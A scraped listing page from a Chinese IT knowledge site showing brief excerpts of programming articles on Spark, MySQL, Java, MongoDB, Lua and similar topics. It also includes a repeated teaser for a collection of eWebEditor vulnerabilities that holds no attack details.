title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1891956.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1877135.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1842814.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/60.htm" title="Dom" target="_blank">Dom</a> <span class="text-muted">周华华</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a> <div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q</div> </li> <li><a href="/article/187.htm" title="【Spark九十六】RDD API之combineByKey" target="_blank">【Spark九十六】RDD API之combineByKey</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a> <div>1. combineByKey函数的运行机制   RDD提供了很多针对元素类型为(K,V)的API，这些API封装在PairRDDFunctions类中，通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一   首先看一下combineByKey的方法说明：</div> </li> <li><a href="/article/314.htm" title="msyql设置密码报错：ERROR 1372 (HY000): 解决方法详解" target="_blank">msyql设置密码报错：ERROR 1372 (HY000): 解决方法详解</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E7%BD%AE%E5%AF%86%E7%A0%81/1.htm">设置密码</a> <div>MySql给用户设置权限同时指定访问密码时，会提示如下错误： ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number；   问题原因：你输入的密码是明文。不允许这么输入。   解决办法：用select password('你想输入的密码');查询出你的密码对应的字符串， 然后</div> </li> <li><a href="/article/441.htm" title="路漫漫其修远兮 吾将上下而求索" target="_blank">路漫漫其修远兮 吾将上下而求索</a> <span class="text-muted">周凡杨</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0+%E6%80%9D%E7%B4%A2/1.htm">学习 思索</a> <div>王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者，罔不经过三种之境界。“昨夜西风凋碧树。独上高楼，望尽天涯路。”此第一境界也。“衣带渐宽终不悔，为伊消得人憔悴。”此第二境界也。“众里寻他千百度，蓦然回首，那人却在灯火阑珊处。”此第三境界也。学习技术，这也是你必须经历的三种境界。第一层境界是说，学习的路是漫漫的，你必须做好充分的思想准备，如果半途而废还不如不要开始。这里，注</div> </li> <li><a href="/article/568.htm" title="Hadoop(二)对话单的操作" target="_blank">Hadoop(二)对话单的操作</a> <span class="text-muted">朱辉辉33</span> <a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a> <div>Debug： 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例： (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,) </div> </li> <li><a href="/article/695.htm" title="web报表工具FineReport常用函数的用法总结（日期和时间函数）" target="_blank">web报表工具FineReport常用函数的用法总结（日期和时间函数）</a> <span class="text-muted">老A不折腾</span> <a class="tag" taget="_blank" href="/search/finereport/1.htm">finereport</a><a class="tag" taget="_blank" href="/search/%E6%8A%A5%E8%A1%A8%E5%B7%A5%E5%85%B7/1.htm">报表工具</a><a class="tag" taget="_blank" href="/search/web%E5%BC%80%E5%8F%91/1.htm">web开发</a> <div>web报表工具FineReport常用函数的用法总结（日期和时间函数）   说明：凡函数中以日期作为参数因子的，其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。   DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年，可为一到四位数。 Month:代表月份。</div> </li> <li><a href="/article/822.htm" title="c++ 宏定义中的##操作符" target="_blank">c++ 宏定义中的##操作符</a> <span class="text-muted">墙头上一根草</span> <a class="tag" taget="_blank" href="/search/C%2B%2B/1.htm">C++</a> <div>#与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs</div> </li> <li><a href="/article/949.htm" title="分析Spring源代码之，DI的实现" target="_blank">分析Spring源代码之，DI的实现</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/DI/1.htm">DI</a><a class="tag" taget="_blank" href="/search/%E7%8E%B0/1.htm">现</a><a class="tag" taget="_blank" href="/search/%E6%BA%90%E4%BB%A3%E7%A0%81/1.htm">源代码</a> <div>(转) 分析Spring源代码之，DI的实现 2012/1/3 by tony                 接着上次的讲，以下这个sample [java]  view plain copy print </div> </li> <li><a href="/article/1076.htm" title="for循环的进化" target="_blank">for循环的进化</a> <span class="text-muted">alxw4616</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>// for循环的进化 // 菜鸟 for (var i = 0; i < Things.length ; i++) { // Things[i] } // 老鸟 for (var i = 0, len = Things.length; i < len; i++) { // Things[i] } // 大师 for (var i = Things.le</div> </li> <li><a href="/article/1203.htm" title="网络编程Socket和ServerSocket简单的使用" target="_blank">网络编程Socket和ServerSocket简单的使用</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B%E5%9F%BA%E7%A1%80/1.htm">网络编程基础</a><a class="tag" taget="_blank" href="/search/IP%E5%9C%B0%E5%9D%80%E7%AB%AF%E5%8F%A3/1.htm">IP地址端口</a> <div>  网络编程;TCP/IP协议   网络:实现计算机之间的信息共享,数据资源的交换   协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去   端口:用于计算机之间的通信      每运行一个程序，系统会分配一个编号给该程序，作为和外界交换数据的唯一标识 0~65535   查看被使用的</div> </li> <li><a href="/article/1330.htm" title="JDK1.5 生产消费者" target="_blank">JDK1.5 生产消费者</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/thread/1.htm">thread</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E4%BA%A7%E6%B6%88%E8%B4%B9%E8%80%85/1.htm">生产消费者</a><a class="tag" taget="_blank" href="/search/java%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">java多线程</a> <div>ArrayBlockingQueue：        一个由数组支持的有界阻塞队列。此队列按 FIFO（先进先出）原则对元素进行排序。队列的头部 是在队列中存在时间最长的元素。队列的尾部 是在队列中存在时间最短的元素。新元素插入到队列的尾部，队列检索操作则是从队列头部开始获得元素。 ArrayBlockingQueue的常用方法： </div> </li> <li><a href="/article/1457.htm" title="JAVA版身份证获取性别、出生日期及年龄" target="_blank">JAVA版身份证获取性别、出生日期及年龄</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%80%A7%E5%88%AB/1.htm">性别</a><a class="tag" taget="_blank" href="/search/%E5%87%BA%E7%94%9F%E6%97%A5%E6%9C%9F/1.htm">出生日期</a><a class="tag" taget="_blank" href="/search/%E5%B9%B4%E9%BE%84/1.htm">年龄</a> <div>        工作中需要根据身份证获取性别、出生日期及年龄，且要还要支持15位长度的身份证号码，网上搜索了一下，经过测试好像多少存在点问题，干脆自已写一个。 CertificateNo.java package com.bijian.study; import java.util.Calendar; import </div> </li> <li><a href="/article/1584.htm" title="【Java范型六】范型与枚举" target="_blank">【Java范型六】范型与枚举</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>首先，枚举类型的定义不能带有类型参数，所以，不能把枚举类型定义为范型枚举类，例如下面的枚举类定义是有编译错的   public enum EnumGenerics<T> { //编译错，提示枚举不能带有范型参数 OK, ERROR; public <T> T get(T type) { return null; </div> </li> <li><a href="/article/1711.htm" title="【Nginx五】Nginx常用日志格式含义" target="_blank">【Nginx五】Nginx常用日志格式含义</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a> <div>1. log_format 1.1 log_format指令用于指定日志的格式，格式：   log_format name(格式名称) type(格式样式)   1.2 如下是一个常用的Nginx日志格式：   log_format main '[$time_local]|$request_time|$status|$body_bytes</div> </li> <li><a href="/article/1838.htm" title="Lua 语言 15 分钟快速入门" target="_blank">Lua 语言 15 分钟快速入门</a> <span class="text-muted">ronin47</span> <a class="tag" taget="_blank" href="/search/lua+%E5%9F%BA%E7%A1%80/1.htm">lua 基础</a> <div>- - 单行注释 - - [[      [多行注释] - - ]]   - - - - - - - - - - - 1. 变量 & 控制流 - - - - - - - - - - num = 23 - - 数字都是双精度 str = 'aspythonstring' </div> </li> <li><a href="/article/1965.htm" title="java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 )" target="_blank">java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 )</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>the idea is from: http://blog.csdn.net/zhanxinhang/article/details/6731134 public class MaxSubMatrix { /**see http://blog.csdn.net/zhanxinhang/article/details/6731134 * Q35 求一个矩阵中最大的二维</div> </li> <li><a href="/article/2092.htm" title="mongoDB文档型数据库特点" target="_blank">mongoDB文档型数据库特点</a> <span class="text-muted">开窍的石头</span> <a class="tag" taget="_blank" href="/search/mongoDB%E6%96%87%E6%A1%A3%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E7%89%B9%E7%82%B9/1.htm">mongoDB文档型数据库特点</a> <div>MongoDD: 文档型数据库存储的是Bson文档-->json的二进制 特点：内部是执行引擎是js解释器，把文档转成Bson结构，在查询时转换成js对象。 mongoDB传统型数据库对比    传统类型数据库：结构化数据，定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的    文档型数据库：不用定好数据结构，</div> </li> <li><a href="/article/2219.htm" title="[毕业季节]欢迎广大毕业生加入JAVA程序员的行列" target="_blank">[毕业季节]欢迎广大毕业生加入JAVA程序员的行列</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>     一年一度的毕业季来临了。。。。。。。。      正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业，可以考虑来我们软件行业，做一名职业程序员。。。      软件行业的开发工具中，对初学者最友好的就是JAVA语言了，网络上不仅仅有大量的</div> </li> <li><a href="/article/2346.htm" title="PHP操作Excel – PHPExcel 基本用法详解" target="_blank">PHP操作Excel – PHPExcel 基本用法详解</a> <span class="text-muted">cuiyadll</span> <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/Excel/1.htm">Excel</a> <div>导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties</div> </li> <li><a href="/article/2473.htm" title="IBM Webshpere MQ Client User Issue (MCAUSER)" target="_blank">IBM Webshpere MQ Client User Issue (MCAUSER)</a> <span class="text-muted">darrenzhu</span> <a class="tag" taget="_blank" href="/search/IBM/1.htm">IBM</a><a class="tag" taget="_blank" href="/search/jms/1.htm">jms</a><a class="tag" taget="_blank" href="/search/user/1.htm">user</a><a class="tag" taget="_blank" href="/search/MQ/1.htm">MQ</a><a class="tag" taget="_blank" href="/search/MCAUSER/1.htm">MCAUSER</a> <div>IBM MQ JMS Client去连接远端MQ Server的时候，需要提供User和Password吗？ 答案是根据情况而定，取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。 http://stackoverflow.com/questions/20209429/how-mca-user-i</div> </li> <li><a href="/article/2600.htm" title="网线的接法" target="_blank">网线的接法</a> <span class="text-muted">dcj3sjt126com</span> <div>一、PC连HUB (直连线)A端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。 B端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。 二、PC连PC （交叉线）A端：(568A)： 白绿，绿，白橙，蓝，白蓝，橙，白棕，棕； B端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。 三、HUB连HUB&nb</div> </li> <li><a href="/article/2727.htm" title="Vimium插件让键盘党像操作Vim一样操作Chrome" target="_blank">Vimium插件让键盘党像操作Vim一样操作Chrome</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/vim/1.htm">vim</a> <div>什么是键盘党？ 键盘党是指尽可能将所有电脑操作用键盘来完成，而不去动鼠标的人。鼠标应该说是新手们的最爱，很直观，指哪点哪，很听话！不过常常使用电脑的人，如果一直使用鼠标的话，手会发酸，因为操作鼠标的时候，手臂不是在一个自然的状态，臂肌会处于绷紧状态。而使用键盘则双手是放松状态，只有手指在动。而且尽量少的从鼠标移动到键盘来回操作，也省不少事。 在chrome里安装 vimium 插件 </div> </li> <li><a href="/article/2854.htm" title="MongoDB查询（2）——数组查询[六]" target="_blank">MongoDB查询（2）——数组查询[六]</a> <span class="text-muted">eksliang</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/MongoDB%E6%9F%A5%E8%AF%A2%E6%95%B0%E7%BB%84/1.htm">MongoDB查询数组</a> <div>MongoDB查询数组 转载请出自出处：http://eksliang.iteye.com/blog/2177292 一、概述  MongoDB查询数组与查询标量值是一样的，例如，有一个水果列表，如下所示： > db.food.find() { "_id" : "001", "fruits" : [ "苹</div> </li> <li><a href="/article/2981.htm" title="cordova读写文件（1）" target="_blank">cordova读写文件（1）</a> <span class="text-muted">gundumw100</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Cordova/1.htm">Cordova</a> <div>使用cordova可以很方便的在手机sdcard中读写文件。 首先需要安装cordova插件：file 命令为： cordova plugin add org.apache.cordova.file 然后就可以读写文件了，这里我先是写入一个文件，具体的JS代码为： var datas=null;//datas need write var directory=&</div> </li> <li><a href="/article/3108.htm" title="HTML5 FormData 进行文件jquery ajax 上传 到又拍云" target="_blank">HTML5 FormData 进行文件jquery ajax 上传 到又拍云</a> <span class="text-muted">ileson</span> <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a><a class="tag" taget="_blank" href="/search/html5/1.htm">html5</a><a class="tag" taget="_blank" href="/search/FormData/1.htm">FormData</a> <div>html5 新东西：FormData  可以提交二进制数据。 页面test.html <!DOCTYPE> <html> <head> <title> formdata file jquery ajax upload</title> </head> <body> <</div> </li> <li><a href="/article/3235.htm" title="swift appearanceWhenContainedIn:(version1.2 xcode6.4)" target="_blank">swift appearanceWhenContainedIn:(version1.2 xcode6.4)</a> <span class="text-muted">啸笑天</span> <a class="tag" taget="_blank" href="/search/version/1.htm">version</a> <div>  swift1.2中没有oc中对应的方法： + (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION;  解决方法： 在swift项目中新建oc类如下： #import &</div> </li> <li><a href="/article/3362.htm" title="java实现SMTP邮件服务器" target="_blank">java实现SMTP邮件服务器</a> <span class="text-muted">macroli</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a> <div>电子邮件传递可以由多种协议来实现。目前，在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP，下面分别简单介绍。 　　◆ SMTP 协议 　　简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议，用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的</div> </li> <li><a href="/article/3489.htm" title="mongodb group by having where 查询sql" target="_blank">mongodb group by having where 查询sql</a> <span class="text-muted">qiaolevip</span> <a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/mongo/1.htm">mongo</a><a class="tag" taget="_blank" href="/search/%E7%BA%B5%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">纵观千象</a> <div>SELECT cust_id, SUM(price) as total FROM orders WHERE status = 'A' GROUP BY cust_id HAVING total > 250 db.orders.aggregate( [ { $match: { status: 'A' } }, { $group: { </div> </li> <li><a href="/article/3616.htm" title="Struts2 Pojo（六）" target="_blank">Struts2 Pojo（六）</a> <span class="text-muted">Luob.</span> <a class="tag" taget="_blank" href="/search/POJO/1.htm">POJO</a><a class="tag" taget="_blank" href="/search/strust2/1.htm">strust2</a> <div>注意：附件中有完整案例 1.采用POJO对象的方法进行赋值和传值 2.web配置 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee&q</div> </li> <li><a href="/article/3743.htm" title="struts2步骤" target="_blank">struts2步骤</a> <span class="text-muted">wuai</span> <a class="tag" taget="_blank" href="/search/struts/1.htm">struts</a> <div>1、添加jar包 2、在web.xml中配置过滤器 <filter>        <filter-name>struts2</filter-name>        <filter-class>org.apache.st</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类：</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>